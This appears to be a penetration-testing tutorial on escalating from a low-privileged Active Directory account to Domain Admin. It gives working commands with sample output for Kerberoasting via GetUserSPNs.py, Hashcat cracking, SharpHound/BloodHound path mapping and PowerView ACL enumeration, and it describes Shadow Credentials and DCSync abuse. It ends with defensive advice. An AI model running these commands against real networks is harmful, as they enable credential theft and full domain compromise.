In the 2024 Scattered Spider campaign, attackers moved from a single compromised helpdesk account to Domain Admin in under four hours — entirely through Active Directory misconfigurations that had existed for years. No zero-days. No exotic exploits. Just well-known attack paths that defenders had never mapped and pentesters had never been asked to test. These paths exist in nearly every enterprise AD environment. Here is how to find and exploit them.
Kerberoasting: Cracking Service Account Passwords Offline
Kerberoasting lets any authenticated domain user request a Kerberos ticket for a service account, then crack the ticket offline. The account does not need elevated privileges. You just need a foothold.
Use Impacket’s GetUserSPNs.py — a script that queries AD for accounts with Service Principal Names and requests their TGS tickets — from your attacker box:
python3 GetUserSPNs.py CORP.LOCAL/jsmith:Password1 \
-dc-ip 192.0.2.10 -request -outputfile kerberoast_hashes.txt
ServicePrincipalName User PasswordLastSet
---------------------------------- ------------ -------------------
MSSQL/db01.corp.local:1433 svc_mssql 2022-03-14 09:11:42
HTTP/intranet.corp.local svc_intranet 2021-07-30 14:05:17
$krb5tgs$23$*svc_mssql$CORP.LOCAL$MSSQL/db01.corp.local~1433*$a3f7c...
Two service accounts, both with tickets you now own. Notice svc_mssql last changed its password in 2022. Old passwords mean weak passwords — organizations rarely rotate service accounts. Feed that hash file straight into Hashcat:
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
--rules-file /usr/share/hashcat/rules/best64.rule
Session.........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5 TGS-REP etype 23)
Cracked..........: $krb5tgs$23$*svc_mssql...:Summer2022!
Password cracked: Summer2022!. From here you authenticate as svc_mssql and check what that account can actually reach. Service accounts frequently have local admin rights on the servers they touch — meaning you now have a pivot point deeper into the network.
BloodHound Attack Path Analysis: From User to Domain Admin
BloodHound ingests AD relationship data and visualises attack paths as a graph. It turns a sprawling, opaque AD environment into a map an attacker can actually navigate. Run the SharpHound collector on any domain-joined machine you control:
SharpHound.exe -c All --domain CORP.LOCAL --zipfilename corp_bloodhound.zip
[+] Resolved Collection Methods: Group,LocalAdmin,Session,Trusts,ACL,
Container,RDP,ObjectProps,DCOM,SPNTargets,PSRemote
[+] Initializing SharpHound at 10:32 on 07/18/2026
[+] Status: 847 objects finished
[+] Output: corp_bloodhound.zip
Import that ZIP into BloodHound’s UI and run the pre-built query “Shortest Paths to Domain Admins.” A real output often looks like this chain:
jsmith@CORP.LOCAL
--[MemberOf]--> HELPDESK@CORP.LOCAL
--[GenericWrite]--> svc_intranet@CORP.LOCAL
--[MemberOf]--> SERVER_ADMINS@CORP.LOCAL
--[AdminTo]--> DC01.CORP.LOCAL
--[DCSync rights via AdminTo]--> DOMAIN ADMIN
Read that chain carefully. Your starting account jsmith is in the HELPDESK group, which has GenericWrite over svc_intranet. GenericWrite is an ACL permission that lets you modify that account’s attributes — including adding an SPN to enable Kerberoasting, or setting a targeted Kerberos delegation. svc_intranet is a member of SERVER_ADMINS, which has local admin rights on DC01. Local admin on a domain controller is effectively Domain Admin.
The attacker’s next move: abuse GenericWrite to perform a targeted Kerberoast on svc_intranet, crack the hash, log into DC01 with those credentials, then run a DCSync to dump all domain hashes. The entire path exists because of one over-permissioned helpdesk group — a misconfiguration that probably nobody has reviewed since the group was created.
ACL Abuse: The Hidden Privilege Escalation Path
Access Control Lists on AD objects are the most overlooked attack surface in most environments. Use PowerView to enumerate ACLs for your compromised user:
Get-DomainObjectAcl -Identity "svc_intranet" -ResolveGUIDs |
Where-Object { $_.ActiveDirectoryRights -match "Write" } |
Select-Object SecurityIdentifier, ActiveDirectoryRights
SecurityIdentifier ActiveDirectoryRights
---------------------------------- ---------------------
S-1-5-21-3820...1109 (HELPDESK) GenericWrite
S-1-5-21-3820...1203 (jsmith) WriteProperty
jsmith has WriteProperty directly on svc_intranet. That means you can write to the account’s msDS-KeyCredentialLink attribute and perform a Shadow Credentials attack — adding a certificate-based credential to the account without knowing or changing its password. No password reset means no alert. No lockout. The account keeps working normally while you authenticate as it using the injected certificate.
This is why ACL enumeration belongs in every AD pentest scope, not just privilege escalation checks against domain groups.
What To Do Now
Pull BloodHound data from your own environment today — even a read-only collection with SharpHound -c DCOnly takes minutes and requires no special privileges. Run the “Shortest Paths to Domain Admins” query and count how many hops separate your lowest-privileged test account from DA. If the answer is fewer than five steps, you have a remediation conversation to have before an attacker has it for you.
